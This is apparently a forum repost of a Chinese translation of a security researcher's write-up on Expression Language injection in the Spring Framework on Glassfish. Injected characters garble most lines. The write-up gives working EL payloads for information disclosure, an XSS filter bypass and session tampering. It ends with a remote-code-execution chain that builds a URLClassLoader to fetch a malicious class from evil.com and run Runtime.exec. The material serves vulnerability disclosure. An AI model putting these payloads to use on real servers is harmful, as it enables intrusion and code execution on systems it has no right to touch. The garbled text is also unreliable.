Remote Code with
8 Z0 E1 y& `* d0 [ c! FExpression Language Injection
+ Y L9 A: x9 M3 ^- b# P* YSpring Framework脆弱性—DanAmodio
- k. z j# C9 |- j3 b全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
- Y" l) H& ]' B S* f可能会存在风险。1 |& k+ s( [, Z0 J1 e9 ]5 h
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
. d9 V* c5 V: F ]Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可/ p! U( p d( I* m9 _' c0 c5 W
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
% @; Q8 d- R* V; S/ X/ ]" O以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
! K, |: H5 O, Q2 u8 Q# ]& i0 c版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。+ k# }3 C: Q. M- j3 ]1 e
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
. C. l, @ Y% U1 C% T. n我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版! C$ g% p8 t6 I4 l* [
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。, R4 a8 U- g3 a5 u: H0 |
这些版本不支持禁用double EL resolution.
y: c ?: D+ K; O* a& t/ Z这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
0 L$ f1 ~) _' D9 n7 v! S/ v) C" LEL2.2容器上可能进行远程代码执行。& i. U r @- F" B) Y$ T& A
这是一个原始信息泄露的攻击例子:
6 F( Y7 ]9 \7 [+ p2 H; c2 j, \3 K1 F请求:
4 Q& {+ O7 \6 Tttp://vulnerable.com/foo?message=${applicationScope}
# K; P7 F6 `1 B3 _8 A- u7 i* Y到达以下内容页面:: ]/ P2 A/ P+ u7 p/ m. M
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
3 \6 a) B+ D, F3 I5 H t( g) E2 C, D你也可以做一些其他事情,如这样:
; d6 ?. P5 d) u% C( z9 f${9999+1}( ^$ N2 t+ M1 P. E! ]
还可以访问session 对象和beans
* M+ R! C+ ]' L${employee.lastName}0 M( l* {1 z% m7 N2 |) N( J
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
% S% t5 L5 \! z6 U: C* @EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
! E1 @8 Y8 K( _6 `" Y: q1 d1 u西,比如XSS.2 A& u- G- L: v$ @8 `
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
& Z$ O9 u8 `- ~) k! v6 ?: F5 U突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤' J4 U* A% w: l& Z0 H5 T. b$ s$ t
呢?”
$ }" H8 ?- x: [: C! N: C+ X& F f因此,我尝试巳缦拢�
! t0 X# U# _: N6 i* g; Ghttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP) p- o a) E% w* V! E4 P
P
' L" [4 M1 b( l" l/ ]5 z我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
* ?! `4 h# y( d2 `% G) Q" i回的文本被插入进了spring:message 标签。1 A2 ^0 I* g/ ~ }
这里是一个最终绕过过滤的实例:
' e& \: a6 S* uhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
. E& G# Z' ]' d6 x: R! @, l它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为4 n3 b0 ?4 O) l
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?( ?4 I. C) X% f# v- O: |
经过一番研究,我学习到EL2.2 增加了方法调用。; r# {; o/ ?- d5 e( Y, }
我写了一个快速测试应用程序代码并且检测一些功能& z* p8 R) S' Q: p4 H6 z
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
5 i0 |' U9 K) P3 x${pageContext.request.getSession().setAttribute(“admin”,true)}
- x. p N/ B$ }9 `8 j1 k$ ?( B好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
7 @7 l5 I( q+ F+ d. G% V7 H指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
5 |; _4 X5 v. v3 \3 [( x${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.15 U, G1 ~; F& @5 R
“, 1234)}
. t( H; {1 R) t7 Z" @0 l/ V- q5 O${“”.getClass().forName(“java.lang.Runtime”)}
+ Z5 r" g8 O3 o0 _! p* p+ B2 k" R哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不' D3 N' ~; ]# M
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函; A# v4 q$ M; X9 a) y
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有4 s* z( }0 [! a$ A7 ?
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
$ U9 k+ u, R" O& T3 n方法签名invoke(Object obj, Object„ args)
5 O' R1 P6 R# QJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
- ]6 J5 l1 J/ F- b5 {题,以让它可以工作起来。
0 U- R) a* O! c" k漏洞利用:( G0 {7 n3 f3 G m
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
: v7 W9 X z, ]1 h1 D3 f希望你们中的一些JAVA奇才告诉我我是如此的可笑。
4 E8 \. K* v$ D; c这里有一些我试过的失败的用例,为了试图让它工作的用例:
9 g0 L7 u/ X. y& ^4 G 写文件到文件系统: \7 h. Z7 _9 c, c! C* Y& o
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.' z1 T+ U j/ V8 e8 |
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
! q; }9 x3 a- F5 L$ l8 o; a${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}! A$ i# {0 e. Z. @
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:/ g2 c7 j# L, q4 q+ b+ J1 y! C
org.springframework.expression.spel.standard.SpelExpressionParser not found* M( \6 c6 Z% A+ a
by# ~- S$ o: N0 a: z" a- w
org.glassfish.web.javax.servlet.jsp [194].
8 c% _7 c/ w& @6 [9 v3 W4 O 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public* U. \, \/ J* F% c
利用反射来创建一个新的Runtime(and watch the world burn)
: x' D5 {9 K& a; l${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName8 }& [5 P+ F' |+ \6 \
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}9 M! W6 R8 m# C
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}5 J! Y% s/ x* P5 U% y" W9 N4 M
使用java.lang.ProcessBuilder2 I( h5 ^1 K" i
用表达式语言来评估表达式语言
! l+ O0 | c- S1 p L4 F' f5 aExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.2 Q3 _0 G7 b# s0 a* x0 H
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request A# j# d8 o; z
“,”".getClass(),null)}, M; W& F. f. I a( n3 {
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂): K! x, v9 P p7 A
我在使用一个空数组通过Method.invoke()时失败了很多次
6 h7 u. S) t" h, Z4 j7 F) j. E“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
" I3 @. w: M- N.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A) v' i) M1 l) Y4 o
rrayList”).newInstance().toArray()). F1 e+ l& ~' {* j4 W4 Y6 @" X
java.lang.IllegalArgumentException: wrong number of arguments4 `% L8 Z+ f1 d9 I
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
6 o7 x, u8 w& h2 i! A- y6 O以创建一个恶意class文件并且指向类装载器.: _' q5 [+ S, J. v/ F% N4 \% \0 U
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:# v5 B" K3 a: s
public class Malicious {$ t5 U; `; s% r
public Malicious() {% Y7 y; b( i5 s' h% H/ s- Z
try {
# Q( S5 d' l3 }0 |! Ljava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac% a. B5 d: r! b/ G$ }) {
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win7 N X7 w/ [) N" C
} catch (Exception e) {
8 F, z6 J/ k/ B/ s& }5 D3 W}% g$ Y) H* V+ k: {* s+ c9 Z- Z' ^2 k
}
/ ~( b8 C5 j8 a我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
$ v, \, B6 R# b5 t# N+ x6 b: N话中,因此它可以被使用. I, k1 _$ `% [
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName$ K! v5 V: J% K+ q7 K6 [
(“java.util.ArrayList”).newInstance())}
9 D) c3 _& y% C: G6 }/ n# cURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建* {3 d# @ K; R1 v+ b! W+ s! X
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
8 W3 H+ O# K$ L, DgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个 Y. C- r1 e- I: F" M' w
我们可以调用的create(string)方法,然后转换对一个URL对象。
0 Z# }+ Z3 e8 ~) ^9 Q5 s1 w${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh# }$ \0 r7 l( X' F0 X, y4 s6 C5 {8 i
ere/malicious/classfile/is/located/”).toURL())}
0 V r8 m, f- W B* }然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,. Y8 v4 `; T8 w6 v1 o
恶意类文件被装载并创建,触发远程代码.8 [7 j, j( y* U* f4 b
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
' _* |5 e. ^' mxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().$ R/ Y5 A' A. m! g
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
" N# @" v5 p+ }& `8 X5 \$ u# i()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对